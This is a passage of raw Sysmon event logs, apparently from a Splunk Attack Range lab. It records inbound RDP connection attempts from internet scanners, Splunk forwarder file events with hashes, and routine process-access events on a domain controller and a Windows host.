SERVICEtcpfalsefalse5.188.206.230-51533-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000064915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:45.430{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57978-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:46.283{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78A2E1EE57D6DCBDACD09A7FF2F0CAD3,SHA256=0E45EC677C4211C25708435D220E16CD5C49D96C063A1EE2C0B1480C0E42FDD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:46.205{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8FEB06AA918E4BD958AFFC96AA8E5A9,SHA256=957D05B323D28FE481D1EA82913F4A5B1AE1A54209338A54DDF848BE074AFFAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049559Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:46.405{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D09DB91CCCB24B9D724F3EC2F0525DF,SHA256=F8C98344FAC1DBD3879CAA927380BE8F7A0E0B9FD90FB5C2B8867F2507776BCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:47.846{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=931F3C7FF6B07D7BA55F25150FF7B1E1,SHA256=E882B9FE021EF6F4EC20B4096851E9DC93D8B6A1FB9CD7B5F26D14ADB75C3EED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:47.252{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6F794EFA44E56D1B42B8C1F4E58DCB4,SHA256=7D47AF0715141FE05D5C41E3936AD9806ADC346C2951AEBB1EEC52375ED91DBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049561Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:47.420{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C64E06A9D9F4D0FEFD6DC441BC0855B3,SHA256=FC50AD109A10108A22E95E1446C1AD7DC04AFA9E17CDE4062DC4A48ABCD091D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049560Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:45.264{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com53940-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000064921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:46.982{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59343-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:46.982{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56613-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:46.770{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64197-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:48.268{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88011D39D2A94EB7766FCA554D39FC49,SHA256=7FEAD1125B10C2AF475FF0F571D4510A0CA5AB66937A0AD13DC16F4BE6C0E0FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049564Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:48.577{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68FE044D2DD44BF150014ED4311B0BD3,SHA256=579C551A6AB072AD3D8BBCC80EA4769A0C48B7390DFA3F477607727014A3B00E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049563Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:48.436{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=575BFE779DD2D4746933988FAAA026BC,SHA256=0C3A167E684466C5FFECE7730DFC127C2046D81FEC9460CB2EB148CE8812722A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049562Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:45.831{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57468-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000064924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:48.436{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-1731msiccpfalse10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:49.518{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48B2BD251AA8EAD25B2406B12F9DB23A,SHA256=056C44E03B558A53B7D8AAF1E28DB50349FCC0F12EF137A91B06E041CCEF298D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:49.330{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76AE3250C068F6F0AE8D37B28EFA7DA3,SHA256=557BA56FA6FDBD59D7CED8C967434C01082118A9C7EE3B9506494EA4FDCC56F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049568Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:49.592{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F6EEA206DAF5890D584D00DB1F32F66,SHA256=2CF1B95B4045C730D8189DF30C64D5F512305C735D14784B5C1CD9B1CACC0BCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049567Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:49.483{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48C321BDE3403375A4EC23E28866DA03,SHA256=E61C6FE8E8973C2BC4A1B2AD69633B1EF0A8C5DE19DEAC0FFA9526F3464103C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049566Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:47.405{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58953-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049565Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:47.292{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55988-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000064925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:50.346{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9644B1394D042CAD18809BB1A2C229BD,SHA256=45EBA930821E31CFC036070CD7945628D9FD29E90E5F2C787E2B45D09B1B6B3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049571Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:50.498{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88128EBFD2CEB02230A7ACE137742616,SHA256=E69D9C44E3592FA4958464E51E772D40E06546D1BE5FFF003D18F40341BAE3A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049570Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:47.959{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com50411-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049569Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:47.732{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52491-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000064930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:51.627{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86981F11EC65DB643BE6FEDFB35440B1,SHA256=FE8A4BED9235614B42DCBB35E28B70F99D4FFC012B99EBC6A8BD68E82CD1FD03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:51.361{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73691A59C06C9DABA3340D06EBAB189A,SHA256=5EDC00D9D122A7BEB998619FAB7C710427CBB5DCD87AE6C78B49CEAFADC997E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:49.952{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-3096-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:49.852{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58463-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:49.104{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57494-false10.0.1.12-8000- 23542300x800000000000000049574Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:51.514{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFAB0DAF4BE0AD2941BF6E29BD720D49,SHA256=3F2A30C2A230B842BF157C3AB7E73877A0487EC669EDECA3AE67DC5FBCBD839E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049573Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:48.992{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60439-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049572Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:51.030{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4D3745835B22C0E60A93E138257B7A9,SHA256=70742585DC53116CE3876D3432CE571E2B4CC1599A92B09AC8D0AAEE93EF8551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:52.408{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AEEDD5B69A31E0F7816DFF512E11ED7,SHA256=0246AF3D1F5520D258177AB291A5DAF2E73D52A8FBF7379AE127272E28C46329,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:50.904{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55267-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049577Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:52.577{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6DB549BCE9B7057F18D7D774CD9BEC6C,SHA256=CD32D837BB2358037EE0ED8D940EEBA5EB5FC36EBE9EAA3CE2A4A1CA72717584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049576Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:52.545{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C69A2B0E6BF5142CD9D9E472AFB1E59,SHA256=9F2DF85787F1EF66840353BA85DCCD26FBC5F369CE7A27A9E3ADBF1CDC09A936,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049575Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:50.598{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61922-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000064935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:53.471{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32914600034B3538AE5E43E800608632,SHA256=2C8421BC64EBA33940632F4839A40F2B0D11B831C295335F388CD573AC9836E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:51.441{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-4462-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000064933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:53.080{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BEFBFF96747EA14746F0C20A1FFED66,SHA256=6FE8C4838CAFA86E18E5E1D9CAC5E90BF0FEADD2AD69708502F3B189DD75572D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049579Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:53.858{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BAA2FF130146DA498CBD77400A5728C0,SHA256=328DDB06C576DCCB9599851A50AFC7C8D8321D6B1F578C88E5D5A98561FFEACD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049578Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:53.561{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FC985FE8A4475B0E0A52255D99F7019,SHA256=4C656E803F9CFBA61974B9FDA48DCCB46E0B6254040E99CE3DA32563F61DFA06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:54.502{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55037B397A70EC534703F581FD3C798D,SHA256=0DCDF4BCB5A598E1E6DB8F1B7784EABB27A457F54C2DF5536358C79CA2DF8A7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049594Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB3E-607E-D406-00000000BB01}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049593Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049592Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049591Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049590Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049589Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:54.858{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049588Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 